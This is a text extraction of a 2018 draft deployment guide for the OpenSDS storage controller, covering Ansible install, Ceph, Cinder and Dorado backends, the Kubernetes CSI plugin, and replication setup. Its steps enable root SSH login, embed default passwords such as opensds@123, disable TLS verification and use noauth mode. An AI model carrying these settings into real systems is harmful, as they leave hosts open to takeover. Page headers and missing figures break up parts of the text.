go1.9.2.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> /etc/profile echo 'export GOPATH=$HOME/gopath' >> /etc/profile source /etc/profile Check golang version information: root@proxy:~# go version go version go1.9.2 linux/amd64 \n docker Install docker: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 5 wget https://download.docker.com/linux/ubuntu/dists/xenial/pool/stable/amd64/docker-ce_18.03.1~ce-0~ubuntu_amd64.deb dpkg -i docker-ce_18.03.1~ce-0~ubuntu_amd64.deb Version information: root@proxy:~# docker version Client: Version: 18.03.1-ce API version: 1.37 Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:17:20 2018 OS/Arch: linux/amd64 Experimental: false Orchestrator: swarm Server: Engine: Version: 18.03.1-ce API version: 1.37 (minimum version 1.12) Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:15:30 2018 OS/Arch: linux/amd64 Experimental: false 4.2 Kubernetes Local Cluster Deployment \n Install Etcd You can install etcd by executing commands blow: cd $HOME wget https://github.com/coreos/etcd/releases/download/v3.3.0/etcd-v3.3.0-linux-amd64.tar.gz tar -xzf etcd-v3.3.0-linux-amd64.tar.gz cd etcd-v3.3.0-linux-amd64 sudo cp -f etcd etcdctl /usr/local/bin/ \n kubernetes local cluster You can start the latest k8s local cluster by executing commands blow: cd $HOME git clone https://github.com/kubernetes/kubernetes.git cd $HOME/kubernetes git checkout v1.10.0 make echo alias kubectl='$HOME/kubernetes/cluster/kubectl.sh' >> /etc/profile ALLOW_PRIVILEGED=true FEATURE_GATES=CSIPersistentVolume=true,MountPropagation=true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 6 RUNTIME_CONFIG=\"storage.k8s.io/v1alpha1=true\" LOG_LEVEL=5 hack/local-up-cluster.sh 4.3 OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. \n Pre-config First download some system packages: apt-get install -y git curl wget Then config /etc/ssh/sshd_config file and change one line: PermitRootLogin yes Next generate ssh-token: ssh-keygen -t rsa ssh-copy-id -i ~/.ssh/id_rsa.pub <ip_address> # IP address of the target machine of the installation \n Download opensds-installer code git clone https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible \n Install ansible tool To install ansible, run the commands below: # This step is needed to upgrade ansible to version 2.4.2 which is required for the \"include_tasks\" ansible command. chmod +x ./install_ansible.sh && ./install_ansible.sh ansible --version # Ansible version 2.4.x is required. \n Configure OpenSDS cluster variables 4.3.4.1 System environment To integrate OpenSDS with cloud platform (for example k8s), modify nbp_plugin_type variable in group_vars/common.yml: nbp_plugin_type: hotpot_only # hotpot_only is the default integration method. Other available options are 'csi' and 'flexvolume'. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 7 Note: If ‘csi’ is the selected nbp_plugin_type, make sure section 4.2 Kubernetes Local Cluster Deployment is followed before proceeding. Change opensds_endpoint to the actual IP address: opensds_endpoint: http://127.0.0.1:50040 # The IP (127.0.0.1) should be replaced with the opensds actual endpoint IP 4.3.4.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address: tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 4.3.4.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 4.3.4.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 8 use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. \n Check if the hosts can be reached ansible all -m ping -i local.hosts \n Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts 4.4 Test OpenSDS \n Use OpenSDS CLI Tool Configure OpenSDS CLI tool: sudo cp /opt/opensds-linux-amd64/bin/osdsctl /usr/local/bin export OPENSDS_ENDPOINT=http://{your_real_host_ip}:50040 export OPENSDS_AUTH_STRATEGY=keystone source /opt/stack/devstack/openrc admin admin osdsctl pool list # Check if the pool resource is available Create a default profile: osdsctl profile create '{\"name\": \"default\", \"description\": \"default policy\"}' Create a volume: osdsctl volume create 1 --name=test-001 List all volumes: osdsctl volume list Delete the volume: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 9 osdsctl volume delete <your_volume_id> \n Test CSI Plugin After running the ansible deployment tool in “csi” mode, three CSI plugin pods can be found by kubectl get pods like below: o csi-provisioner-opensdsplugin o csi-attacher-opensdsplugin o csi-nodeplugin-opensdsplugin More design details about CSI can be found from CSI Volume Plugins in Kubernetes Design Doc. To test the OpenSDS CSI plugin, create an example nginx application: cd /opt/opensds-k8s-linux-amd64/ && kubectl create -f csi/server/examples/kubernetes/nginx.yaml This will create an OpenSDS volume and mount the volume at /var/lib/www/html. Use the following command to inspect the nginx container to verify it. docker exec -it <nginx container id> /bin/bash Clean up example nginx application by the following commands: kubectl delete -f csi/server/examples/kubernetes/nginx.yaml \n OpenSDS Dashboard OpenSDS UI dashboard is available at http://{your_host_ip}:8088, please login the dashboard using the default admin credentials: admin/opensds@123. Create tenant, user, and profiles as admin. Logout of the dashboard as admin and login the dashboard again as a non-admin user to create volume, snapshot, expand volume, create volume from snapshot, create volume group. 4.5 Cleanup OpenSDS \n Run opensds-ansible playbook to clean the environment ansible-playbook clean.yml -i local.hosts This should clean up hotpot as well as nbp (including the CSI plugin). OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 10 \n Run ceph-ansible playbook to clean ceph cluster if ceph is deployed cd /opt/ceph-ansible sudo ansible-playbook infrastructure-playbooks/purge-cluster.yml -i ceph.hosts In addition, clean up the logical partition on the physical block device used by ceph, using the fdisk tool. \n Remove ceph-ansible source code (optional) sudo rm -rf /opt/ceph-ansible 4.6 Troubleshooting \n Problem Starting CSI Plugin If the CSI plugin cannot be started, check if OpenSDS endpoint IP is configured. vi csi/server/deploy/kubernetes/csi-configmap-opensdsplugin.yaml The IP (127.0.0.1) should be replaced with the opensds and identity actual endpoint IP. kind: ConfigMap apiVersion: v1 metadata: name: csi-configmap-opensdsplugin data: opensdsendpoint: http://127.0.0.1:50040 osauthurl: http://127.0.0.1/identity Manually create OpenSDS CSI pods: kubectl create -f csi/server/deploy/kubernetes After this, three pods can be found by kubectl get pods like below: o csi-provisioner-opensdsplugin o csi-attacher-opensdsplugin OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 11 o csi-nodeplugin-opensdsplugin To test the OpenSDS CSI plugin, create an example nginx application: kubectl create -f csi/server/examples/kubernetes/nginx.yaml This will mount an OpenSDS volume into /var/lib/www/html. Use the following command to inspect the nginx container to verify it. docker exec -it <nginx container id> /bin/bash Clean up example nginx application and opensds CSI pods by the following commands. kubectl delete -f csi/server/examples/kubernetes/nginx.yaml kubectl delete -f csi/server/deploy/kubernetes 5 Use Cases 5.1 Dashboard \n Administrator configuration 5.1.1.1 Login Log into dashboard as admin. Password is opensds@123 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 12 5.1.1.2 Create tenant Go to the tab: Identity/Tenant, click “Create” button and input the necessary information, then submit the request. \n 5.1.1.3 Create user Go to the tab: Identity/User, click “Create” button and input the necessary information, then submit the request. Notes: On the page of creation, you can specify tenants that the user belongs to. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 13 5.1.1.4 Create profile Go to the tab: Profile, click “Create” button and input the necessary information, then submit the request. \n 5.1.1.5 View resources Go to Resource tab, check Availability Zone, Region and Storage resources. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 14 \n Tenant provision volume 5.1.2.1 Overview Log into dashboard as user(user1). The home page shows statistics of volumes, snapshots and replications. \n 5.1.2.2 Create volume Go to the tab: Volume/Volume, click “Create” button and input the necessary information, such as name, size, profile, etc., then submit the request. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 15 5.1.2.3 Expand volume size Go to the tab: Volume/Volume, Select a volume and click “More/Expand” button to extend the volume size. \n 5.1.2.4 Create volume snapshot Go to the tab: Volume/Volume, Select a volume and click “Create Snapshot” button to create volume snapshot. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 16 5.1.2.5 Create volume from snapshot Go to the tab: Volume/Volume, Select a volume and click volume name to enter the volume detail page. Select a snapshot and click “Create volume” button to create volume. \n 5.1.2.6 Create volume replication Go to the tab: Volume/Volume, Select a volume and click “Create Replication” button to create replication. Input the secondary volume name, availability zone, profile, then submit the request. Note: To configure a storage backend with replication capabilities, see the section 5.4 Array-based Replication using Dorado. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 17 5.1.2.7 Disable/Enable/Failover volume replication Go to the tab: Volume/Volume, Select the protected volume and click volume name to enter the volume detail page. In replication tab page, click “Disable/Enable/Failover” button to control replication. \n 5.1.2.8 Create volume group Go to the tab: Volume/Volume Group, click “Create” button to create volume group. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 18 5.1.2.9 Add volumes into group Go to the tab: Volume/Volume Group, select a volume group and go into the volume group detail page. Click “Add” button to add volumes into volume group. \n 5.1.2.10 Tenant isolation Log out and log in as user2 and verify that user2 can view volumes created by user1. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 19 Log out and log in as administrator(admin) and can manage the volumes of all tenants. \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 20 5.2 Kubernetes Kubernetes cluster runs on baremetal or VM using OpenSDS to provision storage, using the following drivers: - Native LVM driver - Native Ceph driver - Native Dorado driver - Cinder driver with Cinder stand-alone (LVM by default) Refer to the Installation section to see how to use the OpenSDS CSI plugin to provision storage for Kubernetes. 5.3 OpenStack There are two ways for OpenSDS to integrate with OpenStack. - OpenSDS provisions storage through the southbound Cinder driver. Cinder can be Cinder stand-alone or part of an OpenStack deployment. See the Installation section on how to install OpenSDS to test with Cinder driver. - OpenSDS provisions storage in an OpenStack deployment through the Cinder compatible API. It can be southbound native driver or Cinder driver below OpenSDS in this case. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 21 \n Use OpenSDS to Manage Cinder Drivers As the backend of OpenSDS, Cinder supports many kinds of storage. Therefore, OpenSDS can manage other storage with the help of cinder. But the installer of OpenSDS only supports Cinder with LVM. In order to manage storage supported in Cinder, you need to configure Cinder backend manually. This section will show you an example using ceph as the cinder backend. 5.3.1.1 Prepare A recommend deployment would be like the graph blow. We need three hosts for this testing, say Host A (IP: 192.168.0.99), Host B (IP: 192.168.0.20) and Host C (IP: 192.168.0.21). Note: the keystone in Host A is used for OpenSDS authentication and the keystone in Host B is use for OpenStack authentication, there is no any relationship between them. \n 5.3.1.2 Install OpenStack using devstack You can reference this document https://docs.openstack.org/devstack/latest/ 5.3.1.3 Install ceph using ansible You can reference this document http://docs.ceph.com/ceph-ansible/master/ \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 22 Install Kubernetes using local cluster \n 5.3.1.4 Configuration 5.3.1.4.1 OpenSDS There are two configurations we need to config for OpenSDS: • /etc/opensds/opensds.conf • /etc/opensds/driver/cinder.yaml An example would be like this: 1. /etc/opensds/opensds.conf 2. /etc/opends/driver/cinder.conf #/etc/opensds/opensds.conf [keystone_authtoken] memcached_servers = localhost:11211 signing_dir = /var/cache/cinder cafile = /opt/stack/data/ca-bundle.pem project_domain_name = Default project_name = service user_domain_name = Default password = opensds@123 username = opensds auth_url = http://192.168.0.99/identity auth_type = password [cinder] name = cinder description = Cinder Test driver_name = cinder config_path = /etc/opensds/driver/cinder.yaml [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = keystone [osdsdock] api_endpoint = 192.168.0.99:50050 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 23 Then you can restart the OPenSDS manually. 5.3.1.4.2 Set ceph as backend of Cinder Operation in Node C: 1. Create pool in ceph ceph osd pool create rbd 64 2. Copy the ceph.conf to the Host B which contains cinder-volume server. ssh {your-openstack-server} sudo tee /etc/ceph/ceph.conf </etc/ceph/ceph.conf 3. Set the cinder authentication in ceph. ceph auth get-or-create client.cinder mon 'allow r' osd 'allow class-read object_prefix rbd_children, allow rwx pool=volumes, allow rwx pool=vms, allow rwx pool=images' 4. Generate the authentication file and copy it to Host B. ceph auth get-or-create client.cinder | ssh {your-volume-server} sudo tee /etc/ceph/ceph.client.cinder.keyring ssh {your-cinder-volume-server} sudo chown stack:stack /etc/ceph/ceph.client.cinder.keyring # /etc/opensds/driver/opensds.conf authOptions: endpoint: \"http://192.168.0.20/identity\" domainName: \"Default\" username: \"admin\" password: \"admin\" tenantName: \"admin\" pool: ecs-351b@ceph#ceph: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 3ms OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 24 Operation in Node B: 1. Intall python-rbd and ceph-common which is needed for cinder ceph backend. sudo apt-get install python-rbd sudo apt-get install ceph-common 2. Modified the cinder configuration file /etc/cinder/cinder.conf in Node B: \n3. Restart cinder-volume server sudo systemctl restart devstack@c-vol.service 4. delete default volume type cinder type-delete 1fd30cdc-63d0-4b1d-9e88-3b7b58f05d73 5.3.1.5 Testing Create volume [DEFAULT] ... default_volume_type = ceph enabled_backends = ceph ... [ceph] volume_driver = cinder.volume.drivers.rbd.RBDDriver volume_backend_name = rbd rbd_pool = volumes rbd_ceph_conf = /etc/ceph/ceph.conf rbd_flatten_volume_from_snapshot = false rbd_max_clone_depth = 5 rbd_store_chunk_size = 4 rados_connect_timeout = -1 glance_api_version = 2 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 25 \n OpenSDS with Cinder Compatible API Cinder Compatible API adapter is not built in as part of the ansible deployment tool. Follow the following instruction to install it. 5.3.2.1 Installation 1. The Cinder Compatible API only supports cinder's current Api(v3). You can use devstack to install cinder when testing, but in order to use cinder's current Api(v3), branch for devstack must be stable/queens. 2. When devstack is installed, kill all cinder processes. 3. Run the \"source /opt/stack/devstack/openrc admin admin\" command to execute the openstack's cli command. 4. Run the \"openstack endpoint list\" command to view the cinder endpoint. 5. Run the command \"export CINDER_ENDPOINT=http://10.10.10.10:8776/v3\". The actual value of CINDER_ENDPOINT is determined by the previous step. 6. Run the command export OPENSDS_ENDPOINT=http://127.0.0.1:50040. 7. Download the opensds source (https://github.com/opensds/opensds.git) and install opensds. 8. Run the command \"go build -o ./build/out/bin/cindercompatibleapi github.com/opensds/opensds/contrib/cindercompatibleapi\". 9. Execute the command \"./build/out/bin/cindercompatibleapi\". \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 26 10. Execute some cinder cli commands to see if the result is correct. For example, if you execute the command \"cinder type-list\", the results will show the profile of opensds. 5.3.2.2 Volume Types 5.3.2.2.1 List all volume types (default policy) cinder type-list 5.3.2.2.2 Delete a volume type cinder type-delete \n 5.3.2.2.3 List all volume types(0) cinder type-list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 27 5.3.2.2.4 Create a volume type cinder type-create type00 --description test_type_00 5.3.2.2.5 Show volume type detail cinder type-show Id \n 5.3.2.2.6 Create a volume type(2nd) cinder type-create type01 --description test_type_01 5.3.2.2.7 List all volume types (2) cinder type-list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 28 5.3.2.2.8 Update an encryption type cinder type-update 7abff35e-0cbb-4c48-8bab-4fe7c3286792 --name type0 --description test_type_0 --is-public true If is-public is not set, false is the default which is not supported by opensds: 5.3.2.2.9 Lists current volume types and extra specs. cinder extra-specs-list \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 29 5.3.2.2.10 Create or update extra specs for volume type cinder type-key 7abff35e-0cbb-4c48-8bab-4fe7c3286792 set key1=value1 \n 5.3.2.2.11 Delete extra specification for volume type cinder type-key 7abff35e-0cbb-4c48-8bab-4fe7c3286792 unset key1 \n 5.3.2.3 Volumes 5.3.2.3.1 List accessible volumes with details (0) cinder list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 30 5.3.2.3.2 Create a volume (1st) cinder create 1 --name volume00 \n 5.3.2.3.3 List accessible volumes with details (1) cinder list 5.3.2.3.4 Show a volume’s details cinder show <volume uuid> 5.3.2.3.5 Delete a volume cinder delete <volume uuid> 5.3.2.4 Snapshots \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 31 5.3.2.4.1 Create a snapshot cinder snapshot-create <volume uuid> 5.3.2.4.2 List snapshots and details cinder snapshot-list 5.3.2.4.3 Show a snapshot’s details cinder snapshot-show <snapshot uuid> 5.3.2.4.4 Delete a snapshot cinder snapshot-delete <snapshot uuid> 5.3.2.5 Attachments 5.3.2.5.1 Create attachment cinder attachment-create cinder results: Cinder compatible API results: \n 5.3.2.5.2 Show attachment Cinder attachment-show \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 32 cinder results: \n Cinder compatible API results: \n 5.3.2.5.3 List attachment cinder attachment-list cinder results: Cinder compatible API results: 5.3.2.5.4 Update attachment cinder attachment-update Cinder compatible API results: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 33 5.3.2.5.5 Delete attachment cinder attachment-delete cinder results: \n Cinder compatible API results: \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 34 5.4 Array-based Replication using Dorado \n Without Kubernetes Test using Dashboard and CLI 5.4.1.1 Configuration In array-based replication scenario, we need to depoly opensds in two nodes. Node A includes dashboard, keystone, osdslet, osdsdock(provisioner) and etcd. For simplifying the testing scenario, node B includes just only includes osdsdock. \nNOTE: MGT IP means management ip, ETH IP is used for iscsi. There are two configurations we need to config: • /etc/opensds/opensds.conf • /etc/opensds/driver/dorado.yaml An example in Node A (192.168.56.100) would be like this: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 35 1. /etc/opensds/opensds.conf \n [keystone_authtoken] memcached_servers = 8.46.186.191:11211 signing_dir = /var/cache/opensds cafile = /opt/stack/data/ca-bundle.pem auth_uri = http://8.46.186.191/identity project_domain_name = Default project_name = service user_domain_name = Default password = opensds@123 username = opensds auth_url = http://8.46.186.191/identity auth_type = password [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = keystone [osdsdock] api_endpoint = 192.168.56.100:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 36 2. /etc/opensds/driver/dorado.yaml \n Then you can start opensds servers. Start etcd server: etcd --advertise-client-urls http://192.168.56.100:2379 --listen-client-urls http://192.168.56.100:2379 --listen-peer-urls http://127.0.0.1:2380 Start up osdslet: osdslet --logtostderr -v 8 Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 An example in Node B(192.168.56.101) would be like this: authOptions: endpoints: \"https://192.168.56.200:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool001: diskType: SSD AZ: default accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.200 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 37 1. /etc/opensds/opensds.conf \n 2. /etc/opensds/driver/dorado.yaml \n In node B you just should only start up osdsdock(provisioner). Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 authOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.200/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool_210038bc0177ae4f: diskType: SSD availabilityZone: secondary accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.201 [osdsdock] api_endpoint = 192.168.56.101:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado_remote description = Huawei OceanStor Dorado Remote array driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 38 5.4.1.2 Testing Here is the usage of replication CLI. 1. Create replication. Usage: osdsctl replication create <primary volume id> <secondary volume id> [flags] Flags: -d, --description string the description of created replication -h, --help help for create -n, --name string the name of created replication -p, --primary_driver_data string the primary replication driver data of created replication -m, --replication_model string the replication mode of created replication, value can be sync/async -t, --replication_period int the replication period of created replication, the value must greater than 0 (default 120) -s, --secondary_driver_data string the secondary replication driver data of created replication 2. List replication. Usage: osdsctl replication list [flags] Flags: -h, --help help for list Global Flags: --debug shows debugging output. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 39 3. Show a replication Usage: osdsctl replication show <replication id> [flags] Flags: -h, --help help for show Global Flags: --debug shows debugging output. 4. Enable replication. Usage: osdsctl replication enable <replication id> [flags] Flags: -h, --help help for enable Global Flags: --debug shows debugging output. 5.disable replication Usage: osdsctl replication disable <replication id> [flags] Flags: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 40 -h, --help help for disable Global Flags: --debug shows debugging output. 6. Failover replication Usage: osdsctl replication failover <replication id> [flags] Flags: -a, --allow_attached_volume whether allow attached volume when failing over replication -h, --help help for failover -s, --secondary_backend_id string the secondary backend id of failoverr replication Global Flags: --debug shows debugging output. 7. delete replication Usage: osdsctl replication delete <replication id> [flags] Flags: -h, --help help for delete Global Flags: --debug shows debugging output. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 41 \n With Kubernetes 5.4.2.1 Configuration OpenSDS provide storage to kubernetes using CSI plugin. OpenSDS replication feature also works in kubernetes, when an application pod crashes and the replication status is failedOver, the OpenSDS CSI plugin will switch to the secondary volume automatically. This is totally invisible for users. A simplest testing deployment would be like blow. \nNOTE: MGT IP means management ip, ETH IP is used for iscsi. There are two configurations we need to config: • /etc/opensds/opensds.conf • /etc/opensds/driver/dorado.yaml An example in Node A (192.168.56.100) would be like this: 1. /etc/opensds/opensds.conf \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 42 [keystone_authtoken] memcached_servers = 8.46.186.191:11211 signing_dir = /var/cache/opensds cafile = /opt/stack/data/ca-bundle.pem auth_uri = http://8.46.186.191/identity project_domain_name = Default project_name = service user_domain_name = Default password = opensds@123 username = opensds auth_url = http://8.46.186.191/identity auth_type = password [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = keystone [osdsdock] api_endpoint = 192.168.56.100:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 43 2. /etc/opensds/driver/dorado.yaml \n Then you can start opensds servers. Start etcd server: etcd --advertise-client-urls http://192.168.56.100:2379 --listen-client-urls http://192.168.56.100:2379 --listen-peer-urls http://127.0.0.1:2380 Start up osdslet: osdslet --logtostderr -v 8 Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 An example in Node B(192.168.56.101) would be like this: authOptions: endpoints: \"https://192.168.56.200:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool001: diskType: SSD AZ: default accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.200 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 44 1. /etc/opensds/opensds.conf \n 2. /etc/opensds/driver/dorado.yaml \n In node B you just should only start up osdsdock(provisioner). Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 authOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.200/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool_210038bc0177ae4f: diskType: SSD availabilityZone: secondary accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.201 [osdsdock] api_endpoint = 192.168.56.101:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado_remote description = Huawei OceanStor Dorado Remote array driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 45 Startup kubernetes local cluster in Node A.If you get information like blow, your kubernetes local_cluster startup successfully. \n5.4.2.2 Testing steps 1. Run command kubectl get pod to confirm the OpenSDS CSI plugin server is up. There will be 3 pods. 2. Add the configuration item enableReplication: \"true\" at parameters section to enable the replication feature. \n# sc_pvc.yaml # This YAML file contains StorageClass and PVC # which are necessary to run nginx with csi opensds driver. apiVersion: storage.k8s.io/v1 kind: StorageClass metadata: name: csi-sc-opensdsplugin provisioner: csi-opensdsplugin parameters: enableReplication: \"true\" --- apiVersion: v1 kind: PersistentVolumeClaim metadata: name: csi-pvc-opensdsplugin spec: accessModes: - ReadWriteOnce resources: requests: storage: 1Gi storageClassName: csi-sc-opensdsplugin OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 46 3. Create StorageClss and PVC. You will find two volumes and a replication in OpenSDS. 4. Start up the nginx application pod. \n 5. Set the replication failed over. \n# nginx.yaml # This YAML file contains nginx apiVersion: v1 kind: Pod metadata: name: nginx spec: containers: - image: nginx imagePullPolicy: IfNotPresent name: nginx ports: - containerPort: 80 protocol: TCP volumeMounts: - mountPath: /var/lib/www/html name: csi-data-opensdsplugin volumes: - name: csi-data-opensdsplugin persistentVolumeClaim: claimName: csi-pvc-opensdsplugin readOnly: false OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 47 6. Restart the nginx, you will find the storage which is used by nginx is switch to secondary. \n 5.5 Host-based Replication using DRBD \n Prepare We need to prepare two hosts for this test, say HostA(IP: 192.168.0.131) and HostB(IP: 192.168.0.66). And before we start, please make sure the OpenSDS is already installed on both hosts. And copy etcdctl, etcd, osdslet, osdsdock, osdsctl to /opt/opensds/bin/. \n Install DRBD Install DRBD as the following steps on both hosts: • sudo add-apt-repository ppa:linbit/linbit-drbd9-stack • sudo apt-get update • sudoapt-get install drbd-utils python-drbdmanage drbd-dkms \n Configuration Before do configuration, please stop opensds service first. That is find out the process id of etcd, osdslet and osdsdock, and kill them. Modify /etc/opensds/opensds.conf: • Add host_based_replication_driver for the osdsdock part on both hosts \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 48 • Change endpoint of database on hostB to the same as HostA. Here is the example: [lvm] name = lvm description = LVM Test driver_name = lvm config_path = /etc/opensds/driver/lvm.yaml [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = noauth [osdsdock] api_endpoint = 192.168.0.131:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = lvm host_based_replication_driver = drbd [database] endpoint = 192.168.0.131:62379,192.168.0.131:62380 driver = etcd Add a new configuration file /etc/opensds/attacher.conf on both hosts, here is an example: [osdsdock] api_endpoint = 192.168.0.131:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.0.131 dock_type = attacher [database] endpoint = 192.168.0.131:62379,192.168.0.131:62380 driver = etcd Note: both hosts have the same endpoint of database, but api_endpoint and bind_ip of osdsdock should be the host ip respectively. Add a new configuration file /etc/opensds/drbd.yaml on both hosts, the content is: #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: ecs-37cc IP: 192.168.0.66 Node-ID: 1 - Hostname: ecs-32bc IP: 192.168.0.131 Node-ID: 0 Note: Hostname and IP should be the real value of each hosts. Modify /etc/opensds/driver/lvm.yaml 